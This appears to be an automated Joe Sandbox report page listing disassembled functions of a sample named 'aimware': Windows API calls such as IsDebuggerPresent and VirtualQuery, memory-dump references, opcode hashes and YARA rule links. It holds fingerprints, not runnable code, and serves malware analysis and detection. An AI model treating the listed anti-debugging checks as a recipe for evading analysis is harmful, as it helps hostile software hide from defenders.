Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: cc5092b443f5e4dc8324cd9f10e5b527a0c2f7df6423336df39c7b408973d4be
Instruction ID: b9b7bc2258bf728d15539f49dea2d65b311becef8950aced2ee336de9352d793
Opcode Fuzzy Hash: cc5092b443f5e4dc8324cd9f10e5b527a0c2f7df6423336df39c7b408973d4be
Instruction Fuzzy Hash: 6F6217726002448FDF19DF34C985BEA3BA9EF65300F08457EEC9A8B283DB759945CB60

Function 00ACF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ACF844
IsDebuggerPresent.KERNEL32 ref: 00ACF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00ACF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00ACF93A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c31ee51de2bfc2d26d40549e92f7cb7233d75e0f3004f1aff68477b0dd5409eb
Instruction ID: e26a7bfab9fd9d0ce4070835ce2bdadffbb0ec2db0a27af05d2c072b6750f23f
Opcode Fuzzy Hash: c31ee51de2bfc2d26d40549e92f7cb7233d75e0f3004f1aff68477b0dd5409eb
Instruction Fuzzy Hash: 68311475D052199FDF20DFA4D989BCCBBB8AF08304F1041AEE40DAB250EB719B858F44

Function 00ACE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00ACE5E8,0000001C,00ACE7DD,00000000,?,?,?,?,?,?,?,00ACE5E8,00000004,00B11CEC,00ACE86D), ref: 00ACE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00ACE5E8,00000004,00B11CEC,00ACE86D), ref: 00ACE6CF

Strings

D, xrefs: 00ACE6C3

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 051aa36bc0601c639da557586b2d6d0880d9a30f9f2478b7dab3281226699e78
Instruction ID: 6ebe01b23fd51a846f056c7a71a40ecbf8a0f7769a3e673d31c0a6dc32bdf80c
Opcode Fuzzy Hash: 051aa36bc0601c639da557586b2d6d0880d9a30f9f2478b7dab3281226699e78
Instruction Fuzzy Hash: 29018472600109ABDF14DF69DC49FED7BAAAFC4324F0DC228ED59DB154D634D9068790

Function 00AD8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AD8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AD8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD8FCC

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 061dd67e5b88d0d6b97682c41093af6ec125c773332a907b2d82fb4934ead5cd
Instruction ID: 93ea7348f35cfa7520c565dd040fba38fb454c4cd9fa34536964aae928e6706f
Opcode Fuzzy Hash: 061dd67e5b88d0d6b97682c41093af6ec125c773332a907b2d82fb4934ead5cd
Instruction Fuzzy Hash: 7031A475901219ABCB21DF68DD89B9DBBB8AF08310F5042EAE41CA7250EB749F858F54

Function 00ADD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: a4844bd851ab058d9f7cb1fae5de6b7649f85abea6430e21e78e5c51beab571c
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 07020D71E002199FDF14CFA9D9806ADB7F1FF48314F15816AD91AEB344D731AA41CB90

Function 00ACAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00ACAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00AEE72C,?,?), ref: 00ACAF84

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 9ceb67bae13a4bd3230dead83b7e40bf1aac7fb4a593640817c808dc06837a0e
Instruction ID: d3c19c0438697d8ebfe68e8b5f209d99f33c64cd2bbb8f3f936af7b2e4b1bf38
Opcode Fuzzy Hash: 9ceb67bae13a4bd3230dead83b7e40bf1aac7fb4a593640817c808dc06837a0e
Instruction Fuzzy Hash: 3B01717A200349BADB20DFA4DC45FAB77BCEF19750F004426FA05AB190D3709955CBA5

Function 00AB6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00AB6DDF,00000000,00000400), ref: 00AB6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00AB6C95

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: d8712f3d20f7b218b2417a3c625bb8db6ff425eb78114dd9b76efecaab4aa293
Instruction ID: 08fc6ab15bad5a8c97e0a6d5cc9d842e3ece6fb20d2f46c6634f260b26903a1e
Opcode Fuzzy Hash: d8712f3d20f7b218b2417a3c625bb8db6ff425eb78114dd9b76efecaab4aa293
Instruction Fuzzy Hash: 46D05E32244340BAEE004B614C4AF6A2B59BB41B41F14C4047241990E1C6748411AB14

Function 00AE19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AE19EF,?,?,00000008,?,?,00AE168F,00000000), ref: 00AE1C21

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 9f49f9ec4fd4d9509b92e8876897368c761602d02b4776107b74e9f9c46add83
Instruction ID: 6ff0e01641e6b2af4c30fdc81edc0d8ff881a22d1b31980d7b31937cbcc930be
Opcode Fuzzy Hash: 9f49f9ec4fd4d9509b92e8876897368c761602d02b4776107b74e9f9c46add83
Instruction Fuzzy Hash: 4BB15B31610658DFD719CF29C48AB657BE0FF45364F298658E8AACF2A1C335ED92CB40

Function 00ACF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00ACF66A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 26a73c7d9492133c76fd82d6b1ab98ca8bb65f596be71e0438e7cb12f1c1e797
Instruction ID: 4095109bd30d30cedc889fa3834ef4c9c1eb41dc56b7f47b938a94a821720c54
Opcode Fuzzy Hash: 26a73c7d9492133c76fd82d6b1ab98ca8bb65f596be71e0438e7cb12f1c1e797
Instruction Fuzzy Hash: 285190B19006099FEB28CF98E981BAEBBF5FB48314F25893ED405EB250D3749901CB50

Function 00ABB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00ABB16B

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 47aa720bbf3c57feda6c013b21a26d58cda7a9876c56eb853aebdb5dca2d158f
Instruction ID: 2eac545222d694ef7d934a7d9a1e377c36d7ce79b6f0f0250aa4348581271b68
Opcode Fuzzy Hash: 47aa720bbf3c57feda6c013b21a26d58cda7a9876c56eb853aebdb5dca2d158f
Instruction Fuzzy Hash: 71F03AB4E00248CFDB18CB9CEC92AE973F5FB88315F104295D51593391C7B0AA82CF60

Function 00AB40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 00AB41BC

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 7f4c1cfebfd308226f45f650f57cfb44d917e5517fbb24c3ad8a4fafb1a957ad
Instruction ID: c6eb6e5b9e08f87a431c14f31014b1671b7bc68d2bbebec04833eb6c80ac0b20
Opcode Fuzzy Hash: 7f4c1cfebfd308226f45f650f57cfb44d917e5517fbb24c3ad8a4fafb1a957ad
Instruction Fuzzy Hash: ADC14672A183818FD754CF29D88065BFBE1BFC8208F19892DE998D7312D734A945CB96

Function 00ACF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00ACF3A5), ref: 00ACF9DA

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c1b88941d77a635a990a25d133615c32cdcc528ca4cf1b5412d90f29e6e26bed
Instruction ID: 06b14743fc9304d217874ac9a28c4de52a3b212a7b61cac542715c216463d5f1
Opcode Fuzzy Hash: c1b88941d77a635a990a25d133615c32cdcc528ca4cf1b5412d90f29e6e26bed
Instruction Fuzzy Hash:

Function 00ADC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00ADC030

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 0098de7c9f06c06f8312ed2ef6b5b349771a8a2dac60b6c79ab4f135b3bfc650
Instruction ID: 6662bd23774f14875010ec7f14e9ad8138c56f2e9f71dbca8e07bf0956986018
Opcode Fuzzy Hash: 0098de7c9f06c06f8312ed2ef6b5b349771a8a2dac60b6c79ab4f135b3bfc650
Instruction Fuzzy Hash: 09A011302022008B8B00CF30AE8C2883AA8AA00280308802AA00ACA0A0EA2080A0AB00

Function 00AC62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 7ad844e658e0074eb005d7ffefe9d4f013d938c4cb7676ee78e9872a370ae605
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: CB62E6716047849FCB25CF28C990BB9BBE1BF95304F09896DE8EA8B346D734E945CB11

Function 00AC77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 5e9a229c95683ddeff4219993e4f906a7574efee22a5bb202bda0caf6188502a
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: 2262D4716083858FCB15CF28C880ABDBBE1BF99304F19896DE99A8B346D730E945CF55

Function 00ABF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 7559075e6af53ffe04cfa92d4821345bdc639c7328c3e3ece6341539aaa2e817
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: CF523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00AC7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4915d2057066c4c427ad71f3dd836d9d26c3b2fc36d24432f5a78d654059018
Instruction ID: 21f5819385d4014c9dfdc481891c1a67ed875dfb45267b7e23ae16d8129da174
Opcode Fuzzy Hash: c4915d2057066c4c427ad71f3dd836d9d26c3b2fc36d24432f5a78d654059018
Instruction Fuzzy Hash: 5812B0B16087068FC718CF28C990BBDB7E1FB94304F15892EE996CB781E734A995CB45

Function 00ABC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eaf5ef2547d190a9c60b2dd7d78e67310b372135a07d719a595cf2607d8f259
Instruction ID: 6c8805078b1e80a817c473ece90a9a010e2d92981fbe596dfbb60b240cf2d274
Opcode Fuzzy Hash: 9eaf5ef2547d190a9c60b2dd7d78e67310b372135a07d719a595cf2607d8f259
Instruction Fuzzy Hash: 43F1BA71A083118FD718CF28C594AAABBE9EFCA324F145A2EF4D5D7253D730E9458B42

Function 00AC6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 988f83ad980a34ba0c122f2f3ebe128bae4d13af20b65f7323c77402d911e9dc
Instruction ID: de8b7aef1a3c087033ef4aa92d3af4c1826e25c80becdf6c0e8125df492cc0df
Opcode Fuzzy Hash: 988f83ad980a34ba0c122f2f3ebe128bae4d13af20b65f7323c77402d911e9dc
Instruction Fuzzy Hash: F0D1D6B16083448FDB14CF28C944B9BBBE5BF89308F09456EF8999B342D774E905CB96

Function 00ABE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
